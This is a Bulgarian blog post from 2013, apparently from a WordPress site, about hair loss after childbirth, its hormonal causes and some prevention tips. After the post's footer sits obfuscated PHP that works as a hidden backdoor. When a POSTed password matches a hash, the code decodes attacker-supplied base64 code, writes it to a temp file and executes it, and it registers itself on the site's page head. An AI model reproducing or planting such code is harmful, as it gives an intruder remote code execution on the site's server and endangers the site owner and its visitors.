Косопад след раждане | Косопад

Косопад след раждане

косопад след раждане

косопад след раждане

За огромна част от жените съвсем не е необичайно да получат косопад след раждане. При всяка отделна дама нивата на това медицинско състояние са различни, като в най – тежките случаи може да се стигне и до 70 % плешивост. Не се страхувайте, защото оплешивяването поради тази причина е временно и в почти винаги косата се възстановява сама за няколко месеца.

Причини за косопад след раждане

Специалистите обясняват, че оредяването на косата се дължи на промените в хормоналните нива, които през този етап са особено драстични. Особено много „играе” женският полов хормон естроген, чието ниво е супер ниско при появата на бебето, като това се превръща в една от големите причини.

Най – висока интензивност на косопад се наблюдава около три месеца после раждането на детето, но няколко месеца по – късно спира и косата постепенно започва да възвръща първоначалното си състояние. Принципно това се случва до една година.

Оплешивяване може да бъде предизвикано и от ред други причини като аборт (умишлен или спонтанен), промяна в приема на противозачатъчни медикаменти, психическия и физически стрес по време на бременност.

Превенция на косопад след раждане

Въпреки че голямата част от жените получават оплешивяване в тези етапи от живота си, има няколко безопасни начина, които могат поне да намалят дефекта. Запомнете, че каквото и да правите, правете го само с позволението на вашият лекар.

  • Яжте повече сурови храни. Пресните плодове и зеленчуци са богати на витамини и минерали, съдържат антиоксиданти и флавоноиди. Всички тези вещества осигуряват защита срещу косопад и стимулират космения растеж.
  • Приемайте суплементи за бременни, които включват витамините С, В, Е и микроелемента цинк.
  • Поне на този етап забравете за козметиката и оставете настрани всички маши, сешоари, преси, бои и други подобни.
  • Мийте косата с шампоан по – рядко и използвайте само продукти на натурална основа.
  • Правете си подходящи подхранващи маски срещу косопад.

20. август 2013 20:15:41 от Косопад
Категории: Любопитно за косопада | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}